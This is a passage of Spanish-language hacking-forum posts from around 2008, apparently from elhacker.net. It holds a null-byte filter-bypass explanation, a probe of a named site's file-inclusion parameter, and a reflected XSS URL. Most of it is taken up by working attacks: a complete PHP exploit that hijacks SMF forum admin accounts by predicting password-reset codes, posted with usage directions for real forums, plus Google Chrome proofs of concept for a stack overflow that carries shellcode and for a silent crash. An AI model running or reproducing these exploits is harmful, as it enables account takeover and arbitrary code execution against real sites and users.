Mensajes

Referencia:
http://www.jccharry.com/fake/1.txt

Se sabe que el archivo está ahí por el error que arroja:

Warning: require_once(content/fuck.php) [function.require-once]: failed to open stream: No such file or directory in /home/mkportal/domains/mkportal.es/public_html/mkportal/modules/docs/index.php on line 150

Fatal error: require_once() [function.require]: Failed opening required 'content/fuck.php' (include_path='.:/usr/local/lib/php') in /home/mkportal/domains/mkportal.es/public_html/mkportal/modules/docs/index.php on line 150

por lo cual el archivo que está tratando de incluir "show=fake" "content/fuck.php" falla, si hacemos un "show=copyright" entonces suponemos que está en "content/copyright.php"

Un null byte es un byte nulo, por ejemplo en un explordor se escribe %00 o simplemente un cero para bases de datos y en algunos casos proboca que un filtro no funcione adecuadamente ya que un byte nulo significa el término del buffer pero nosotros continuamos mas allá, te explico mejor...

"hola, como estás"
Para algunas funciones eso significa una palabra completa

"hola, %00 como estás"
Para algunas funciones la palabra termina hasta donde no haya bytes, o sea un byte nulo, eso significa que para la función la palabra termina después de la coma y no hay nada mas, eso significa que después de eso no es filtrado y podemos ejecutar sentencias mysql o de inclusiones debido a filtros diseñados con explode, eregi, preg, etc.

Estyo sucede muy a menudo al no deshabilitar el ingreso de bytes nulos desde el mismo script.

En la programación de visual basic se escribe "chr(0)", en C++ se escribe "\x00", en php, perl es lo mismo y en exploradores es en urlencode, o sea "%00".

http://www.google.cl/search?hl=es&q=null+byte+vulnerability&btnG=Buscar+con+Google&meta=

Se ve bueno el sitio.

Código [Seleccionar] Expandir

http://chromekb.com/vulnerabilities/"><h1>ARREGLENMEE!</h1>






fuente:
http://www.jccharry.com/fake/1.txt

Estaba realizando unas funciones propias para un sistema que estoy haciendo y quería compartirlo con ustedes si es que agún dia tienen la misma necesidad:

Código (php) [Seleccionar] Expandir

<?php
$palabra = "1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950";
echo whk_recorta($palabra,10);
/* Resultado: 1234567891...4647484950 */

function whk_recorta($palabra,$limite){
 if($limite < 1){
  return $palabra;
 }
 if(strlen($palabra)>(($limite * 2) + 1)){
  for($cuenta=0;$cuenta<$limite;$cuenta++){
   $palabra_final .= $palabra[$cuenta];
  }
  $palabra_final .= "...";
  for($cuenta = (strlen($palabra) - $limite); $cuenta <= strlen($palabra); $cuenta++){
   $palabra_final .= $palabra[$cuenta];
  }
  return $palabra_final;
 }else{
  return $palabra;
 }
}
?>

De esta forma se recortan hacia ambos lados... derecha e isquierda.

["%00"]

Estaba mirando el sitio oficial de mkportal y pude ver que para visualizar una sección utiliza inclusiones hacia el archivo con el nombre de la variable "show" + .php
Por ejemplo:

Código [Seleccionar] Expandir

http://www.mkportal.es/mkportal/modules/docs/index.php?show=copyright

En realidad está haciendo una inclusión hacia:

Código [Seleccionar] Expandir

http://www.mkportal.es/mkportal/modules/docs/content/copyright.php

En el cual no verifica si realmente puede ser incluido o existe aquella página como se ve en el siguiente ejemplo:

Código [Seleccionar] Expandir

http://www.mkportal.es/mkportal/modules/docs/index.php?show=fuck

Warning: require_once(content/fuck.php) [function.require-once]: failed to open stream: No such file or directory in /home/mkportal/domains/mkportal.es/public_html/mkportal/modules/docs/index.php on line 150

Fatal error: require_once() [function.require]: Failed opening required 'content/fuck.php' (include_path='.:/usr/local/lib/php') in /home/mkportal/domains/mkportal.es/public_html/mkportal/modules/docs/index.php on line 150

Y si hacemos una petición GET directamente a un archivo nos resulta..

Código [Seleccionar] Expandir

http://www.mkportal.es/mkportal/modules/docs/content/copyright.php

Fatal error: Class 'module' not found in /home/mkportal/domains/mkportal.es/public_html/mkportal/modules/docs/content/copyright.php on line 6

Aumentando las probabilidades de una inclusión remota o talves solo local. Probé inyectando null bytes para evadir la extensión pero no fue posible, si ingresas un punto, slqsh o algún caracter que no sea número o letra te lo toma como nó válido, a exepción de un byte nulo como "%00" asi que el resto será solo cosa de imaginación.

REFERENCIA:
http://www.jccharry.com/fake/1.txt

Recuerda que solo funciona para SMF que esté montado en un servidor con windows debido a su limitación de la generación de números al azar con la función rand().

se usa mas masomenos así:

Código [Seleccionar] Expandir

php ./smf.php www.foro.com / --userid=1

Donde se supone que el id 1 es el admin, puedes posicionar el mouse sobre el nick del admin de un foro y abajo te aparecerá el número de id en la variable "u" que por lo general es 1.

Lo que hace el exploit es un crackeo de la clave insegura que debuelve al resetear el password de alguien aprobechandose de la cantidad limitada por windows para generar tal código y por eso es que no funciona en foros que están montados sobre un servidor con Linux.

yan@yan-desktop:~/Escritorio$ php ./smf.php
---------------------------------------------------------------
SMF <= 1.1.5 Admin Reset Password Exploit (win32-based servers)
(c)oded by Raz0r (http://raz0r.name/)
---------------------------------------------------------------
USAGE:
~~~~~~
php ./smf.php [host] [path] OPTIONS

[host] - target server where SMF is installed
[path] - path to SMF

OPTIONS:
--userid=[value] (default: 1)
--username=[value] (default: admin)
examples:
php ./smf.php site.com /forum/
php ./smf.php site.com / --userid=2 --username=odmen
yan@yan-desktop:~/Escritorio$

El único inconveniente es que funciona para servidores que corren con Window$  (windows pwned!)

código:

Código (php) [Seleccionar] Expandir

<?php
echo "---------------------------------------------------------------\n";
echo "SMF <= 1.1.5 Admin Reset Password Exploit (win32-based servers)\n";
echo "(c)oded by Raz0r (http://Raz0r.name/)\n";
echo "---------------------------------------------------------------\n";

if ($argc<3) {
   echo "USAGE:\n";
   echo "~~~~~~\n";
   echo "php {$argv[0]} [host] [path] OPTIONS\n\n";
   echo "[host] - target server where SMF is installed\n";
   echo "[path] - path to SMF\n\n";
   echo "OPTIONS:\n";
   echo "--userid=[value] (default: 1)\n";
   echo "--username=[value] (default: admin)\n";
   echo "examples:\n";
   echo "php {$argv[0]} site.com /forum/\n";
   echo "php {$argv[0]} site.com / --userid=2 --username=odmen\n";
   die;
}

/**
* Software site: http://www.simplemachines.org
*
* SMF leaks current state of random number generator through hidden input parameter `sc`
* of the password reminder form:
*
* $_SESSION['rand_code'] = md5(session_id() . rand());
* $sc = $_SESSION['rand_code'];
*
* Since max random number generated with rand() on win32 is 32767 and session id
* is known an attacker can reverse the md5 hash and get the random number value.
* On win32 every random number generated with rand() is used as a seed for the next
* random number. So if SMF is installed on win32 platform an attacker can predict
* all the next random numbers. When password reset is requested SMF uses rand()
* function to generate validation code:
*
* $password = substr(preg_replace('/\W/', '', md5(rand())), 0, 10);
*
* So prediction of the validation code is possible and an atacker can set his
* own password for any user.
*
* More information about random number prediction:
* http://www.suspekt.org/2008/08/17/mt_srand-and-not-so-random-numbers/
*
* More information about the behaviour of rand() on win32 (in Russian):
* http://raz0r.name/articles/magiya-sluchajnyx-chisel-chast-2/
*/

set_time_limit(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",10);

$host = $argv[1];
$path = $argv[2];

for($i=3;$i<=$argc;$i++){
   if(isset($argv[$i]) && strpos($argv[$i],"--userid=")!==false) {
       list(,$userid) = explode("=",$argv[$i]);
   }
   if (isset($argv[$i]) && strpos($argv[$i],"--username=")!==false) {
       list(,$username) = explode("=",$argv[$i]);
   }
}

if(!isset($userid))$userid="1";
if(!isset($username))$username="admin";

$sess = md5(mt_rand());
echo "[~] Connecting to $host ... ";
$ock = fsockopen($host,80);
if($ock) echo "OK\n"; else die("failed\n");

$packet = "GET {$path}index.php?action=reminder HTTP/1.1\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cookie: PHPSESSID=$sess;\r\n";
$packet.= "Keep-Alive: 300\r\n";
$packet.= "Connection: keep-alive\r\n\r\n";

fputs($ock, $packet);

while(!feof($ock)) {
   $resp = fgets($ock);
   preg_match('@name="sc" value="([0-9a-f]+)"@i',$resp,$out);
   if(isset($out[1])) {
       $md5 = $out[1];
       break;
   }
}

if($md5) {
   $seed = getseed($md5);
   if($seed) {
       echo "[+] Seed for next random number is $seed\n";
   } else die("[-] Can't calculate seed\n");
}
else die("[-] Random number hash not found\n");

function getseed($md5) {
   global $sess;
   for($i=0;$i<=32767;$i++){
       if($md5 == md5($sess . $i)) {
           return $i;
       }
   }
}

$sc = md5($sess . $seed);
$data   = "user=".urlencode($username)."&sc=$sc";
$packet = "POST {$path}index.php?action=reminder;sa=mail HTTP/1.1\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cookie: PHPSESSID=$sess;\r\n";
$packet.= "Connection: close\r\n";
$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet.= "Content-Length: ".strlen($data)."\r\n\r\n";
$packet.= $data;

fputs($ock, $packet);

$resp='';
while(!feof($ock)) {
   $resp .= fgets($ock);
}

if(preg_match("@HTTP/1.(0|1) 200 OK@i",$resp)===false) {
   die("[-] An error ocurred while requesting validation code\n");
}

if(strpos($resp,"javascript:history.go(-1)")!==false) {
   die("[-] Invalid username\n");
}

srand($seed);
for($i=0;$i<6;$i++){
   rand();
}
$password = substr(preg_replace('/\W/', '', md5(rand())), 0, 10);
echo "[+] Success! To set password visit this link:\nhttp://{$host}{$path}index.php?action=reminder;sa=setpassword;u={$userid};code=$password\n";
?>

# milw0rm.com [2008-09-06]

Fuentes:
http://milw0rm.com/exploits/6392
http://www.jccharry.com/blog/2008/09/07/whk_vulnerabilidad-en-sistema-de-foros-smf-115-y-versiones-anteriores.html

desbordamiento de la memoria y la ejecución arbitraria de código..

Código (html4strict) [Seleccionar] Expandir

<html>
<head>
<!--
This file is saved as "Unicode" type because Chrome convert data (payload) to "Unicode" while handling. This PoC Code execute a calculator.

Here comes details :

We (SVRT-Bkis) have just discovered vulnerability in Google Chrome 0.2.149.27 and would like to inform you with this.

The vulnerability is caused due to a boundary error when handling the "SaveAs" function. On saving a malicious page with an overly long title (<title> tag in HTML), the program causes a stack-based overflow and makes it possible for attackers to execute arbitrary code on users' systems.

To exploit the Vulnerability, a hacker might construct a specially crafted Web page, which contains malicious code. He then tricks users into visiting his Website and convinces them to save this Page. Right after that, the code would be executed, giving him the privilege to make use of the affected system.

Tested on Google Chrome (Language: Vietnamese) on Windows XP SP2.

Discoverer : Le Duc Anh - SVRT - Bkis
SVRT, which is short for Security Vulnerability Research Team, is one of Bkis researching groups. SVRT specializes in the detection, alert and announcement of security vulnerabilities in software, operating systems, network protocols and embedded systems...

Website : http://security.bkis.vn
Mail : svrt[at]bkav.com.vn
-->

<title>
瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉邐ଋ)邐邐邐邐邐邐邐邐줱⑴寴玁㘭荞ﳫ씐干ⷬᮽꛐ孊Ⲕ헙㖣ƽⳌ៝ᥧ徽ᰂ쟶ꥀ⫶叼ꫝ秗娒좙ƽⳈ㣝Ⅷ핽ㆳ딷ㅧ徽ꐇ穪鸇Ꚉ湶剎浧픺㆜햛▄埝굧庆ⷬ㚽狐ꠇ箌ꚿํ媼䖳ꂮ⍦ꅡ下㉗ⶏ帶AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
</title>
</head>
<body>
Click 'Save As' function for checking this vulnerability.
Note: Opening multiple Calculators.

</body>
</html>

Fuentes:
http://seclists.org/bugtraq/2008/Sep/0070.html
http://security.bkis.vn/Proof-Of-Concept/PoC-XPSP2.html
http://milw0rm.com/exploits/6367

Por ahí escuché que Google Chrome no soporta RSS 

http://foro.elhacker.net/.xml.html;sa=news;board=34;limit=10;type=rss

[El bug encontrado anteriormente ya fue expuesto en milw0rm con este link:]

pd: Un detallito, cualquier navegador iria igual de limado que el chrome si por pestaña consumiese 20mb como me lo esta haciendo en este mismo momento

Mi firefox anda casi igual o mas rápido porque lo manejo en prioridad alta desde el administrador de tareas mientras hago mis trabajos y eso que todavía no se instalan plugines dentro del explorador de google porque ahi si va a pesar y va a tomar mas lentitud ya que si separa cada pestaña en un proceso diferente eso significa que debe iniciar el proceso de un plugin por cada pestaña adicional.

URL:

about:

Contenido:

Google Chrome
0.2.149.27 (1583)
Build oficial
Google Inc.
Copyright © 2006-2008 Google Inc. Todos los derechos reservados.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13

El explorador se basa en el motor de Safri y no es propio como un amigo me habia comentado.


El bug encontrado anteriormente ya fue expuesto en milw0rm con este link:
http://milw0rm.com/exploits/6365

javascript:Alert("test");

javascript:alert("test");

Ojo porque Google Chrome diferencia entre mayusculas y minusculas al momento de ejecutar javascript causando una grán incompatibilidad con algunos sitios webs que por costumbre inician la primera letra de sus funciones con mayusculas entre varios otros, pero no así en la declaración de la utilización de scripts:

javascript:alert("test");

Haciendo que sea incompatible para el buén funcionamiento y accesible para ataques de tipo XSS con escapes de case sensitive.


Talves esto sea la principal razón de la incompatibilidad con algunos sitios webs.

[2.php]

encontré un bug un poco mas elegante  se trata de que cuando vizualizas una web este se cierra sin decirle nada  a nadie y sin dar avisos de error ni nada, simplemente se cierra y ya.

http://www.jccharry.com/pruebas/Google%20Chrome/2.php

Como vi que este descargaba todo sin pedir confirmación pensé en dar algún tipo de archivo que no pudiese ser guardado como un "con" o un archivo con mas de 255 caracteres y ahi va el exploit:

Código (php) [Seleccionar] Expandir

<?php

/*
Google Chrome 0.2.149.27 (1583) Silent Crash PoC
WHK - elhacker.net 
*/

$nombre = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa